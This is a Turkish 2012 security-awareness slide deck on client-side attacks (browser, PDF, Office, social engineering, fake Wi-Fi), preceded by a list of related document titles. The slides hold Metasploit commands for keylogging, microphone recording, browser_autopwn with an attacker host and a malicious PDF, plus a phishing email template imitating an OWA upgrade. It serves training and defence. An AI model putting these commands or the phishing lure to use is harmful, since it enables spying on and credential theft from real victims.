İstemci Tabanlı Saldırı Türleri. Ozan UÇAR ozan.ucar@bga.com.tr



Benzer belgeler
Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Sızma Testlerinde İleri Düzey Teknikler. Ozan UÇAR

Güvenlik Riskleri ve Saldırı Yöntemleri. Ozan UÇAR Bilgi Güvenliği Akademisi (BGA)

VoIP Pentest NetSEC / Microso3 Türkiye Ozan UÇAR ozan.ucar@bga.com.tr

Sızma Testlerinde Fiziksel Güvenlik Riskleri

/pikalite / bilgipi /pikalite EĞİTİM HİZMETLERİMİZ

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği

Bilgi Güvenliği Semineri

KABLOSUZ AĞ GÜVENLİĞİNE KURUMSAL BAKIŞ

KURUM AĞLARINI ÖNEMLĠ ZARARLI YAZILIM SALDIRILARINDAN KORUMA. Osman PAMUK

NGN ve VoIP Ağları Güvenlik Denetimi

BİLGİSAYAR VE AĞ GÜVENLİĞİ

İnternet te Bireysel Güvenliği Nasıl Sağlarız? Rauf Dilsiz Bilgi Güvenliği Uzmanı

Malware Analizi Yöntem ve Araçları. Huzeyfe ÖNAL Bilgi Güvenliği

Bilgi Güvenliği Açısından Sızma Testlerinin Önemi

06 - Bilgi Toplama ve Sosyal Mühendislik

Sampaş Akademi Eğitim Portali Kullanım Kılavuzu

ÖĞRENCİLER İÇİN UZAKTAN EĞİTİM SİSTEMİ (MOODLE) KULLANIM KILAVUZU

BÖLÜM 8. Bilişim Sistemleri Güvenliği. Doç. Dr. Serkan ADA

(... GÜÇLÜ KORUMA, DÜŞÜK SİSTEM KAYNAĞI KULLANIMI...)

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

01 Şirket Profili

: 36 milyon Euro çalan malware Eurograbber

Dünyanın bilgisine açılan pencere... Ya da sadece yeni çağın eğlencesi...

perculus Sanal Sınıf Sistemi

VERİ GÜVENLİĞİ. Ağ Güvenliği. Özer Çelik Matematik-Bilgisayar Bölümü

Twitter da bu durumla karşılaşan başka kullanıcılar var mı diye twitter virüs anahtar kelimeleri ile genel bir arama yaptığımda ise bu durumun Nisan

Zararlı Kodlar& Analiz Temelleri ve Bir Saldırının Anatomisi

EĞİTMENLER İÇİN UZAKTAN EĞİTİM SİSTEMİ (MOODLE) eders.giresun.edu.tr KULLANIM KILAVUZU

Enerji, bankacılık, finans, telekomünikasyon gibi önemli sektörler Sinara Labs ile siber saldırılar a karşı güvende

Dünyanın bilgisine açılan pencere... Ya da sadece yeni çağın eğlencesi...

Bilgisayar Dersi. Öğr. Gör Kağan GÜL. Kırşehir Ahi Evran Üniversitesi

Öğrencilerin Canlı derslere katılması, * Sisteme giriş

1 WEB GÜVENLIĞINE GIRIŞ

Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme

DONANIM VE YAZILIM. Donanım Nedir? Donanım: Bilgisayarda elle tutabildiğimiz, gözle görebildiğimiz tüm fiziksel parçalara donanım denir.

SİBER GÜVENLİK FARKINDALIĞI

ENFORMATİK Dersin Amacı

Kaspersky Küçük ve Orta Ölçekli İşletmeler İçin Güvenlik

BİLGİ SİSTEMLERİ GÜVENLİĞİ

BİLGİSAYAR BİLİMLERİ ARAŞTIRMA VE UYGULAMA MERKEZİ BİLGİ GÜVENLİĞİ

BTP 207 İNTERNET PROGRAMCILIĞI I. Ders 1

Web Uygulama Açıklıkları ve Saldırı Engelleme Sistemleri Web uygulama açıklıkları karşısında saldırı engelleme sistemlerinin yetersizliği

Internet ve World Wide Web

T.C. MİLLİ EĞİTİM BAKANLIĞI Öğretmen Yetiştirme ve Geliştirme Genel Müdürlüğü HİZMETİÇİ EĞİTİM ETKİNLİK PROGRAMI

Web Uygulamarına Yönelik DoS DDoS Saldırıları ve Performans Testleri. Barkın

Cambridge LMS e Başlama- Öğrenciler

İnternet ve İnternet Tarayıcıları BİLGİ VE İLETİŞİM TEKNOLOJİSİ DERS NOTU - 2

Google Cloud Print Kılavuzu

Siber Dünyada Güvenlik ve Bireysel Mahremiyet. Huzeyfe ÖNAL

UZAKTAN EĞİTİM SİSTEM KULLANIM REHBERİ

Kütüphane Kullanıcıları için İçeriğin Zenginleştirilmesi II

BİLGİSAYAR TEMEL KAVRAMLAR. Bilgi ve İletişim Teknolojisi Ders Notları

Sisteminiz Artık Daha Güvenli ve Sorunsuz...

Bilgi Güvenliği Eğitim/Öğretimi

Firewall/IPS Güvenlik Testleri Eğitimi

Siber Güvenlikte Neler Oluyor? Hasan H. SUBAŞI KAMU SİBER GÜVENLİK DERNEĞİ GENEL SEKRETER

Özgür Uygulamalar ile Web Güvenliği. The OWASP

Siber Güvenlik Basın Buluşması. C.Müjdat Altay 15 Haziran 2015

Windows Temelli Zararlı Yazılımlarla Mücadele

Bilgi Güvenliği Nedir? Bilgi Güvenliğinde Saldırı Kavramı. Bilgi Güvenliğinde Saldırı Örneği : SPAM Mail

SİBER ESPİYONAJ FAALİYETLERİ VE TÜRKİYE

Tanımı Problemi 46 Şüpheci Yaklaşım 47 Tamsayı Taşması (Integer Overflow) 47 Tamsayı Taşması Java Uygulaması 48

BANKACILIK DÜZENLEME VE DENETLEME KURUMU (Bilgi Yönetimi Dairesi)

(Bilgisayar ağlarının birbirine bağlanarak büyük bir ağ oluşturmasıdır)

Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ

Armitage Nedir? Kullanım Öncesi

Anti-Virüs Atlatma 3. Kurulum

ORTA DOĞU TEKNİK ÜNİVERSİTESİ BİLGİ İŞLEM DAİRE BAŞKANLIĞI. Güvenlik ve Virüsler. ODTÜ BİDB İbrahim Çalışır, Ozan Tuğluk, Cengiz Acartürk

Bugün. Ülke Güvenlik Analizi (DDoS, Botnetler, Spam vs.) Sosyal Ağ Güvenliği Büyük Veri ve Bulut Güvenliği. Siber Güvenlik ve Farkındalık Eğitimi

TÜBİTAK UEKAE ULUSAL ELEKTRONİK ve KRİPTOLOJİ ARAŞTIRMA ENSTİTÜSÜ

K.A.ALPER YAZOĞLU ORTAOKULU 6.SINIFLAR BİLİŞİM TEKNOLOJİLERİ VE YAZILIM DERSİ ÇALIŞMA KÂĞIDI

TÜBİTAK ULAKBİM ELEKTRONİK İMZA ENTEGRASYONU HİZMET ALIMI TEKNİK ŞARTNAMESİ

Veri(Data), sayısal veya mantıksal her değer bir veridir. Bilgi(Information), verinin işlenmiş, anlamlı hale gelmişşekline bilgi denir.

Bilgi Güvenliği. Kurumsal Eğitim Kataloğu Siber Güvenlik Farkındalığı

BİLİŞİM SİSTEMLERİ GÜVENLİĞİ EĞİTİM KATALOĞU (2015)

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.

APT Saldırıları Karşısında Güvenlik Sistemlerinin Yetersizliği

UZAKTAN EĞİTİM SİSTEMİ ÖĞRENCİ EKRANLARI KULLANIM KILAVUZU

İ ZMİ R KÂ Tİ P ÇELEBİ Ü Nİ VERSİ TESİ ÜZÂKTÂN EĞ İ Tİ M Sİ STEMİ Ö Ğ RENCİ KÜLLÂNİM KİLÂVÜZÜ

Bilgisayar Programalamaya Giriş

Tarık TALAN [MOODLE SİSTEMİ TEMEL KULLANIM KILAVUZU]

06 - Bilgi Toplama ve Sosyal Mühendislik

Linux Temelli Zararlı Yazılımların Bulaşma Teknikleri, Engellenmesi ve Temizlenmesi

Ağ Güvenliği. Ağ iletişim tehditlerini sıralamak. Saldırı yöntemleri ve güvenlik önlemlerini tanımlamak.

MOBİL İMZA KULLANIM AMAÇLI NİTELİKLİ ELEKTRONİK SERTİFİKA BAŞVURU TALİMATI

Vodafone dan Office 365. Satış temsilcisi ismi Tarih

MOBİL CİHAZLARDA KULLANIM REHBERİ

e-fatura Portalı Kullanım Kılavuzu

Uzaktan Eğitim Uygulama Ve Araştırma Merkezi. İstanbul Rumeli Üniversitesi UZEM Kullanma Klavuzu

XSS Exploitation via CHEF

Cambridge LMS e Başlama- Öğrenciler

Bilgisayar Ağları ve Ağ Güvenliği DR. ÖĞR. ÜYESİ KENAN GENÇOL HİTİT ÜNİVERSİTESİ ELEKTRİK-ELEKTRONİK MÜH.

Cambridge LMS e Başlama- Öğrenciler

ELEKTRONİK BELGE YÖNETİM SİSTEMİ KULLANICI GİRİŞ VE E-İMZA İŞLEMLERİ KLAVUZU

Google Hacking. Gelişmiş Google Operatörleri

INFORMATION & SECURITY TECHNOLOGIES. BOA - Trend Micro. Zararlı Yazılım Analizi ve APT. Yasin SÜRER yasin.surer@boateknoloji.com

MOBİL CİHAZLARDAN DERS İZLEME MERSİN MESLEK YÜKSEKOKULU (UZAKTAN EĞİTİM) Mobil Adobe Connect

CEVAP; Evrak ön izlemede kararan sayfa göründüğünde yapılacak işlemler aşağıdaki gibi gerçekleşecektir.

Transkript:

İstemci Tabanlı Saldırı Türleri Ozan UÇAR ozan.ucar@bga.com.tr Kayseri 2012

Konuşmacı Hakkında Kıdemli Bilgi Güvenliği Danışmanı ve Eğitmen Bilgi Güvenliği AKADEMİSİ () PenetraPon Tester Blog Yazarı blog.bga.com.tr www.cehturkiye.com İlePşim Skype: ozan.ucar Eposta: ozan.ucar@bga.com.tr TwiVer: @ucarozan 2

Ajanda Hacker ların ve Güvenlik Dünyasının GidişaY İstemci Tabanlı Saldırı Türleri Başarılı Bir Saldırı Sonrası Olası Tehditler Casus Yazılım Tehlikeleri İstemci Bilgisayarlar Nasıl Korunuyor Uygulamalar Korunma Yöntemleri 3

Hacking Kültürü Hakkında Bilgisayar yer aly dünyası bir aynalı salondur. Gerçekler bükülür, doğrular küçülür. 4

Güvenlik Dünyasının GidişaY Firewall IDS/IPS WAF

Hacker larin GidişaY Client insecurity Mobile insecurity Social Networks/ Eng.

İstemci Tabanlı Saldırı Türleri Browser (İnternet Tarayıcılar) Eposta Yazılımları PDF Okuyucular Office Yazılımları XSS Saldırıları Java Uygulamaları Media Player Casus Yazılımlar Sosyal Mühendislik 7

Saldırı Sonrası Olası Tehditler Keylogger Kurulumu Klavye girişlerinin dinlenmesi Webcam Casusu Gizli video kaydı ve fotoğraf Ortam Dinleme Ses kaydı Veri Sızdırma Kayıtlı parolalar, önemli ofis dosyaları vb. Bilgisayarı KöleleşPrme Botnet ordusuna kaylma, DDOS saldırılarında bulunma İç networkü dış dünyaya açma ve yerel ağdaki diğer sistemlere saldırı 8

İstemci Bilgisayarlar Nasıl Korunuyor? AnPvirüs Yazılımları AnPvirus Uygulamaları İmza tabanlı & Sezgisel AnPvirus Yazılımları AnPvirus Bypass Teknikleri Kişisel Firewall Yazılımları Atlatma senaryoları... Bilinç Farkındalık ve eğipmin önemi 9

Tanınmaz Casus Yazılım Oluşturmak AnPvirus test Tarama Sonucu: www.virustotal.com/file- scan/report.html?id=728f30350259034aac5af95dd7a3cbe56612b31347c37005e9f7508c05c0d6fc- 1322614624 10

Meterpreter Keylogger Keylogger olarak kullanımı; > keyscan_start > keyscan_dump Hedefin ekran görüntüsünü ele geçirme > screenshot 11

Meterpreter Webcam Casusu Webcam görüntüsünü ele geçirmek Webcam canlı video görüntüsünü almak 12

Meterpreter Ortam Dinleme Kurban sistemde bir mikrofon varsa, ortam dinlemesi yapılabilir. > record_mic - d 25 // 25. sn boyunca dinleme yap ve kaydet. [*] StarPng... [*] Stopped Audio saved to: /opt/metasploit3/msf3/nfqyscte.wav 13

Ajan Marmara EğiPm için gelişprilmişpr. Mouse haraketlerini takip eder. Sanal klavye casusluğu yapmaktadır. AnPvirus ve Sezgisel AnPlogger lara karşı tanınma oranı 0/43 Verileri saldırgana ait sunucuya POST eder. 14

Ajan Marmara 15

Ajan Marmara 16

Browser Tabanlı Açıklıklar Bir browser exploip, kötü amaçlı gelişprilmiş zararlı kod parçasıdır. Kullanıcının bilgisi olmadan, bilgisayarına zararlı yazılım bulaşyrmak veya izinsiz/yetkisiz değişikliklerde bulunmak için kullanılır. Zararlı kod; HTML, Image, Java, Javascript, AcPveX veya başka bir web teknolojisi olabilir. Zayıflıklar, browser teknolojisinden veya eklenplerinden kaynaklanabilir. 17

Browser Tabanlı Açıklıklar Uygulama Browser Autopwn; Firefox, IExplorer, Chrome,Opera msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > set LHOST saldirgan.com LHOST => 85.95.238.172 msf auxiliary(browser_autopwn) > set SRVPORT 80 SRVPORT => 80 msf auxiliary(browser_autopwn) > set URIPATH /giris URIPATH => /giris msf auxiliary(browser_autopwn) > exploit [*] - - - Done, found 23 exploit modules [*] Using URL: hvp://0.0.0.0:80/giris [*] Local IP: hvp://saldirgan.com :80/giris 18

PDF Okuyucular Uygulama PDF formaynın popüler olması ile birlikte, PDF okuyucuların açıklıklarları etkili bir hacking malzemesi haline gelmişpr. Adobe Reader msf > use exploit/windows/fileformat/adobe_gepcon msf exploit(adobe_gepcon) > set FILENAME belge.pdf FILENAME => belge.pdf msf exploit(adobe_gepcon) > exploit [*] CreaPng 'belge.pdf' file... [+] belge.pdf stored at /var/www/belge.pdf 19

Office Yazılımları Uygulama Microso Word RTF pfragments Stack Buffer Overflow (File Format) Microso office 2010, 2007 ve 2003 sürümlerini etkileyen ve gelişi güzel kod çalışyrmayı sağlayan açıklık. 20

Sosyal Mühendislik Saldırıları Teknik sorunlar teknik yollarla çözülür, insan tabanlı sorunlar insanla çözülür Oltalama saldırıları facebook.com > facabook.com Bir web sitesinin bire bir benzerini (clone) oluşturmak Java Uygulamaları Sahte Kablosuz Ağlar 21

SM Oltalama Saldırıları 1 3 2 22

SM Web Clone & Java Applet (1) Social- Engineer Toolkit Java uygulaması olarak casus yazılım bulaşyrma 23

SM Web Clone & Java Applet (2) hvp://85.95.238.172/linkedin 24

SM Eposta ile Avlama Sayın ilgili, Şirket bünyesinde uzun süredir altyapı çalışmalarını yürütmekte olduğumuz yeni nesil e- posta ve ilepşim sistemlerine bu ha a ipbariyle geçiş yapmış bulunmaktayız. Kullanılan e- posta hesaplarında problem yaşanmaması adına aşağıda bağlanysı verilen OWA(Outlook Web Access) uygulamasına giriş yaparak hesabımı güncelle seçeneğini işaretlemeniz beklenmektedir. OWA 2012 Giriş Xyz Firması Insan Kaynakları YönePmi 25

SM Eposta ile Avlama OWA sayfasının bire bir aynısı. Kurban eposta bilglerini yazdıkdan sonra, saldırının farkına varmasın diye gerçek OWA sayfasına yönlendirilir. 26

Sahte Kablosuz Erişim Noktaları Yalnızca amacı kötü olduğu için sahte olarak isimlendirilir, gerçeğinden ayırt edilemez J Kablosuz ağ istemcileri, saldırgan taraˆndan yayın yapan kablosuz ağa dahil oldukdan sonra, tüm internet trafiği kaydedilir. DNS önbelleğini zehirleyerek sahte erişim sayfaları ile kimlik avı yapabilir. 27

Sahte Kablosuz Erişim Noktaları 28

Sahte Kablosuz Erişim Noktaları Saldırı yapılan sistemden ekran görüntüsü 29

Sahte Kablosuz Erişim Noktaları İnternete ilk girildiği anda, sahte bir güncelleme mesajı ile casus yazılım kurban bilgisayara yüklenir. 30

Teşekkürler